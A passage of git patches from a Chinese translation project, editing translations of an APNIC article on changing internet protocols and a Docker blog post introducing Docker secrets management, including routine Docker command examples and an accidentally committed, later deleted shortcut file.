通讯,因为,它们认为那是有害的或者是低优先级的通讯。 +例如,TLS 1.3 有一些临门一脚的问题是中间设备假设它是旧版本的协议。gQUIC 将几个对 UDP 通讯进行限流的网络列入了黑名单,因为,那些网络认为 UDP 通讯是有害的或者是低优先级的。 -当一个协议因为已部署而 “冻结” 它的可扩展点导致不能被进化,我们称它为 _已骨化_ 。TCP 协议自身就是一个严重骨化的例子,因此,很中间设备在 TCP 上做了很多的事情 — 是否阻止有无法识别的 TCP 选项的数据包,或者,优化拥塞控制。 +当一个协议因为已有的部署而 “冻结” 它的可扩展点,从而导致不能再进化,我们称它为 _已经僵化了_ 。TCP 协议自身就是一个严重僵化的例子,因此,太多的中间设备在 TCP 协议上做了太多的事情,比如阻止了带有无法识别的 TCP 选项的数据包,或者,“优化”了拥塞控制。 -有必要去阻止骨化,去确保协议可以被进化,以满足未来互联网的需要;否则,它将成为一个 ”公共的悲剧“,它只能是满足一些个别的网络行为的地方 — 虽然很好 — 但是将影响整个互联网的健康发展。 +防止僵化是有必要的,确保协议可以进化以满足未来互联网的需要;否则,它将成为一个“公共灾难”,一些个别网络的行为 —— 虽然在那里工作的很好 —— 但将影响整个互联网的健康发展。 -这里有很多的方式去阻止骨化;如果被讨论的数据是加密的,它并不能被任何一方所访问,但是持有密钥的人,阻止了干扰。如果扩展点是未加密的,但是在一种可以打破应用程序可见性(例如,HTTP 报头)的方法被常规使用后,它不太可能会受到干扰。 +有很多的方式去防止僵化;如果被讨论的数据是加密的,它并不能被除了持有密钥的人之外任何一方所访问,阻止了干扰。如果扩展点是未加密的,但是通常以一种可以明显中断应用程序的方法使用(例如,HTTP 报头),它不太可能受到干扰。 -协议设计者不能使用加密的地方和一个不经常使用的扩展点、人为发挥的可利用的扩展点;我们称之为 _润滑_ 它。 +协议设计者不能使用加密的扩展点不经常使用的情况下,人为地利用扩展点——我们称之为 _润滑_ 它。 -例如,QUIC 鼓励终端在 [版本协商][32] 中使用一系列的诱饵值,去避免它永远不变化的假定实现(就像在 TLS 实现中经常遇到的导致重大问题的情况)。 +例如,QUIC 鼓励终端在 [版本协商][32] 中使用一系列的诱饵值,来避免假设它的实现永远不变化(就像在 TLS 实现中经常遇到的导致重大问题的情况)。 -#### 网络和用户 +### 网络和用户 -除了避免骨化的愿望外,这些变化也反映出了网络和它们的用户之间的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 — 或者至少是公正的 — 这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。 +除了避免僵化的愿望外,这些变化也反映出了网络和它们的用户之间关系的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 —— 或者至少是公正的 —— 但这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。 -因此,互联网用户的整体需求和那些想去访问流经它们的网络的用户数据的网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施策略的网络;例如,企业网络。 +因此,当那些网络想去访问一些流经它们的网络的用户数据时,互联网用户的整体需求和那些网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施政策干预的网络;例如,企业网络。 -在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不是所有者或者能够访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。 +在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不拥有或无法访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。 -因此,在 IETF 中围绕协议开发的许多讨论,是去接触企业和其它的 ”叶子“ 网络之间偶尔的需求竞争,并且这对互联网的整体是有好处的。 +因此,在 IETF 中围绕协议开发的许多讨论,触及了企业和其它的 “叶子” 网络有时相互竞争的需求,以及互联网整体的好处。 -#### 参与 +### 参与 -为了让互联网在以后工作的更好,它需要为终端用户提供价值、避免骨化、并且允许网络去控制。现在发生的变化需要去满足所有的三个目标,但是,我们需要网络运营商更多的投入。 +为了让互联网在以后工作的更好,它需要为终端用户提供价值、避免僵化、让网络有序运行。现在正在发生的变化需要满足所有的三个目标,但是,人们需要网络运营商更多的投入。 -如果这些变化影响你的网络 — 或者没有影响 — 请在下面留下评论,或者更好用了,通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。 +如果这些变化影响你的网络 —— 或者没有影响 —— 请在下面留下评论。更好地可以通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。 感谢 Martin Thomson 和 Brian Trammell 的评论。 - _Mark Nottingham 是互联网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的共同主持人。_ +_本文作者 Mark Nottingham 是互联网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的联席主席。_ -------------------------------------------------------------------------------- @@ -133,7 +133,7 @@ via: https://blog.apnic.net/2017/12/12/internet-protocols-changing/ 作者:[Mark Nottingham][a] 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From fd64aa9bef57b28b3a296d2afda332ba6b8cf224 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 17 Dec 2017 22:12:04 +0800 Subject: [PATCH 0664/1627] PUB:20171212 Internet protocols are changing.md @qhwdw https://linux.cn/article-9155-1.html --- .../20171212 Internet protocols are changing.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171212 Internet protocols are changing.md (100%) diff --git a/translated/tech/20171212 Internet protocols are changing.md b/published/20171212 Internet protocols are changing.md similarity index 100% rename from translated/tech/20171212 Internet protocols are changing.md rename to published/20171212 Internet protocols are changing.md From e59f4a2664dbe6b4689dbc579b6d290dee90040f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sun, 17 Dec 2017 22:13:19 +0800 Subject: [PATCH 0665/1627] complete translation and make it standard format --- ...09 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index d4fbffde9e..7b6161a475 100644 --- a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -1,4 +1,4 @@ - + Dockers Secrets 管理介绍 ========================= @@ -6,9 +6,9 @@ Dockers Secrets 管理介绍 ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) -构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序 涉密数据。我们很高兴可以推出Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 +构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序 涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 -有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据(secret) 分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像GitHub嵌入涉密数据(secrets)到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 +有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据(secret) 分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据(secrets)到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 ### Docker 涉密数据(Secrets) 管理介绍 @@ -26,17 +26,17 @@ Dockers Secrets 管理介绍 $ echo "This is a secret" | docker secret create my_secret_data - ``` -一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用NACL 开源加密库中的Salsa20Poly1305加密算生成的256 位密钥加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 +一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的Salsa20Poly1305加密算生成的256位密钥加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 -当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用Raft进行传播,将且会在管理器启动的时候被使用。 +当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。 -当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的TLS连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求 涉密数据 的服务。 +当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。 ``` $ docker service  create --name="redis" --secret="my_secret_data" redis:alpine ``` -未加密的涉密数据被挂载到一个容器,该容器位于 /run/secrets/ 的内存文件系统中。 +未加密的涉密数据被挂载到一个容器,该容器位于 `/run/secrets/` 的内存文件系统中。 ``` $ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets @@ -54,7 +54,7 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret cat: can't open '/run/secrets/my_secret_data': No such file or directory ``` -查看Docker sercet文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。 +查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。 [Get safer apps for dev and ops w/ new #Docker secrets management][5] @@ -65,7 +65,7 @@ cat: can't open '/run/secrets/my_secret_data': No such file or directory ### 通过 Docker 更安全地使用应用程序 -Docker 涉密数据旨在让开发人员和IT运营团队轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用Docker Compose定义应用程序和涉密数据,到 IT 管理人员直接在Docker Datacenter中部署Compose文件、涉密数据(涉密数据),networks 和卷 volumes 都将加密、安全地跟应用程序一起传输。 +Docker 涉密数据旨在让开发人员和IT运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用Docker Compose定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署 Compose 文件、涉密数据(涉密数据),networks 和卷 volumes 都将加密、安全地跟应用程序一起传输。 更多相关学习资源: From eacc2a3e9a48c031c8184380992316a5299a0260 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Sun, 17 Dec 2017 22:30:26 +0800 Subject: [PATCH 0666/1627] mmtranslated by HardworkFish --- ...G DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk | Bin 0 -> 1168 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk new file mode 100644 index 0000000000000000000000000000000000000000..e9452e58c511f2eb35dc8fba68b2415c784c43ca GIT binary patch literal 1168 zcmcIjPiWI%6#r!owxWj)>TohK$^=D>X)mJ{VI_%OmnN-EszY;Vmj-le*U@xrg6y(` zOcXW{2Fh^$89RuAhn+-G@GQbS2!hBC3L*-M!VZG(OS*OwVJGwPy?@`!@4fuKmlOal z)It(??n#`wg?8{{caNw6uCmJI&Yr#(pIGJA=Y0L(fS<_usv)B-A?(k5NWbPk$1Vo% zzHP@*QC#T4aV2IolA4B&u;%+fjE(1XAJR&huGQ#^Q^AR^MqAJ0i$qHB3*-n z3`Hu0?!YD=*n=}$D!G;Ms_nSwYt+eW(`w$U^HXBLf73K19pqfX94BO(a9zsj#0DF) z>Yb$^YL0zjGaChs#aZv`|HS-ifAPAtL9Y=Tj}QU7ra85v$|E9%d&S69SkPqLsP}nA zecHiJ8Rjm91a>g7>1lg%go{9=uk9tttSERSsZ*0!O+!YG_-B5C;xa`fs8HyPhe28* zOQBqYd<}8Ri&LgTw&Gz3D5FUA_R_veyPGyw*ZyPxGvx24&3c<1Y(tRrtCuS)ppjw| zW0}>$s9P%3oJ_Sc?ASG{ejgTN(DFZAjPgm{%%l++WvoR(B2%NvT6RZN4|;(9!x zXo_wMWok!;K+CGjt@mU#IJP`K{x36!h^H8JvN7e>w$o|RENz~vX1{r#!^J_;>?u0# zNUbt`loKpuX@0Sk`tbOWO+F2SZ&tF>G?wk!!09cHY r4jUQcac5b6czvvYxxY`ie{%BLK8mx+L_h5plL4FApr0$^8x8pfaBt!i literal 0 HcmV?d00001 From 53dc81fdc05bb528406419d298bc4c3852fec6f4 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Sun, 17 Dec 2017 22:34:09 +0800 Subject: [PATCH 0667/1627] translated by HardworkFish --- ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 111 ++++++++++++++++++ 1 file changed, 111 insertions(+) create mode 100644 translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md new file mode 100644 index 0000000000..7b6161a475 --- /dev/null +++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -0,0 +1,111 @@ + +Dockers Secrets 管理介绍 +========================= + +容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。 + + ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) + +构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序 涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 + +有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据(secret) 分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据(secrets)到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 + +### Docker 涉密数据(Secrets) 管理介绍 + +根本上我们认为,如果有一个标准的接口来访问涉密数据,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密数据进行加密;在空闲的时候也对涉密数据 进行加密;防止涉密数据在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密数据,不能多也不能不少。 + +通过将涉密数据整合到 docker 的业务流程,我们能够在遵循这些确切的原则下为涉密数据的管理问题提供一种解决方案。 + +下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密数据对象,安全地传递给我们的容器。 + + ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) + +在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个 涉密数据 加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。 + +``` +$ echo "This is a secret" | docker secret create my_secret_data - +``` + +一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的Salsa20Poly1305加密算生成的256位密钥加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 + +当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。 + +当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。 + +``` +$ docker service  create --name="redis" --secret="my_secret_data" redis:alpine +``` + +未加密的涉密数据被挂载到一个容器,该容器位于 `/run/secrets/` 的内存文件系统中。 + +``` +$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets +total 4 +-r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data +``` + +如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该 涉密数据的节点,这些节点将不再有权访问该应用程序的 涉密数据。 + +``` +$ docker service update --secret-rm="my_secret_data" redis + +$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data + +cat: can't open '/run/secrets/my_secret_data': No such file or directory +``` + +查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。 + +[Get safer apps for dev and ops w/ new #Docker secrets management][5] + +[CLICK TO TWEET][6] + +### +![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1) + +### 通过 Docker 更安全地使用应用程序 + +Docker 涉密数据旨在让开发人员和IT运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用Docker Compose定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署 Compose 文件、涉密数据(涉密数据),networks 和卷 volumes 都将加密、安全地跟应用程序一起传输。 + +更多相关学习资源: + +* [1.13 Docker 数据中心具有 Secrets, 安全扫描、容量缓存等新特性][7] + +* [下载 Docker ][8] 且开始学习 + +* [在 Docker 数据中心尝试使用 secrets][9] + +* [阅读文档][10] + +* 参与 [即将进行的在线研讨会][11] + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/02/docker-secrets-management/ + +作者:[ Ying Li][a] +译者:[HardworkFish](https://github.com/HardworkFish) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/yingli/ +[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20... +[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management +[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB +[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management +[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB +[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB +[7]:http://dockr.ly/AppSecurity +[8]:https://www.docker.com/getdocker +[9]:http://www.docker.com/trial +[10]:https://docs.docker.com/engine/swarm/secrets/ +[11]:http://www.docker.com/webinars +[12]:https://blog.docker.com/author/yingli/ +[13]:https://blog.docker.com/tag/container-security/ +[14]:https://blog.docker.com/tag/docker-security/ +[15]:https://blog.docker.com/tag/secrets-management/ +[16]:https://blog.docker.com/tag/security/ +[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/ +[18]:https://docs.docker.com/engine/swarm/secrets/ +[19]:https://lvh.io%29/ From 2406e2f88fb342f9945deba47f74b8a0a1891c3a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sun, 17 Dec 2017 22:36:09 +0800 Subject: [PATCH 0668/1627] some errors --- ...G DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk | Bin 1168 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md - 快捷方式.lnk deleted file mode 100644 index e9452e58c511f2eb35dc8fba68b2415c784c43ca..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1168 zcmcIjPiWI%6#r!owxWj)>TohK$^=D>X)mJ{VI_%OmnN-EszY;Vmj-le*U@xrg6y(` zOcXW{2Fh^$89RuAhn+-G@GQbS2!hBC3L*-M!VZG(OS*OwVJGwPy?@`!@4fuKmlOal z)It(??n#`wg?8{{caNw6uCmJI&Yr#(pIGJA=Y0L(fS<_usv)B-A?(k5NWbPk$1Vo% zzHP@*QC#T4aV2IolA4B&u;%+fjE(1XAJR&huGQ#^Q^AR^MqAJ0i$qHB3*-n z3`Hu0?!YD=*n=}$D!G;Ms_nSwYt+eW(`w$U^HXBLf73K19pqfX94BO(a9zsj#0DF) z>Yb$^YL0zjGaChs#aZv`|HS-ifAPAtL9Y=Tj}QU7ra85v$|E9%d&S69SkPqLsP}nA zecHiJ8Rjm91a>g7>1lg%go{9=uk9tttSERSsZ*0!O+!YG_-B5C;xa`fs8HyPhe28* zOQBqYd<}8Ri&LgTw&Gz3D5FUA_R_veyPGyw*ZyPxGvx24&3c<1Y(tRrtCuS)ppjw| zW0}>$s9P%3oJ_Sc?ASG{ejgTN(DFZAjPgm{%%l++WvoR(B2%NvT6RZN4|;(9!x zXo_wMWok!;K+CGjt@mU#IJP`K{x36!h^H8JvN7e>w$o|RENz~vX1{r#!^J_;>?u0# zNUbt`loKpuX@0Sk`tbOWO+F2SZ&tF>G?wk!!09cHY r4jUQcac5b6czvvYxxY`ie{%BLK8mx+L_h5plL4FApr0$^8x8pfaBt!i From b7155bb70230b21c28c0b29f70cd26897bb6570e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sun, 17 Dec 2017 22:37:41 +0800 Subject: [PATCH 0669/1627] complete the translation --- ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 111 ------------------ 1 file changed, 111 deletions(-) delete mode 100644 sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md deleted file mode 100644 index 7b6161a475..0000000000 --- a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ /dev/null @@ -1,111 +0,0 @@ - -Dockers Secrets 管理介绍 -========================= - -容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。 - - ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) - -构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序 涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 - -有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据(secret) 分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据(secrets)到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 - -### Docker 涉密数据(Secrets) 管理介绍 - -根本上我们认为,如果有一个标准的接口来访问涉密数据,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密数据进行加密;在空闲的时候也对涉密数据 进行加密;防止涉密数据在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密数据,不能多也不能不少。 - -通过将涉密数据整合到 docker 的业务流程,我们能够在遵循这些确切的原则下为涉密数据的管理问题提供一种解决方案。 - -下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密数据对象,安全地传递给我们的容器。 - - ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) - -在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个 涉密数据 加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。 - -``` -$ echo "This is a secret" | docker secret create my_secret_data - -``` - -一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的Salsa20Poly1305加密算生成的256位密钥加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 - -当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。 - -当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。 - -``` -$ docker service  create --name="redis" --secret="my_secret_data" redis:alpine -``` - -未加密的涉密数据被挂载到一个容器,该容器位于 `/run/secrets/` 的内存文件系统中。 - -``` -$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets -total 4 --r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data -``` - -如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该 涉密数据的节点,这些节点将不再有权访问该应用程序的 涉密数据。 - -``` -$ docker service update --secret-rm="my_secret_data" redis - -$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data - -cat: can't open '/run/secrets/my_secret_data': No such file or directory -``` - -查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。 - -[Get safer apps for dev and ops w/ new #Docker secrets management][5] - -[CLICK TO TWEET][6] - -### -![Docker 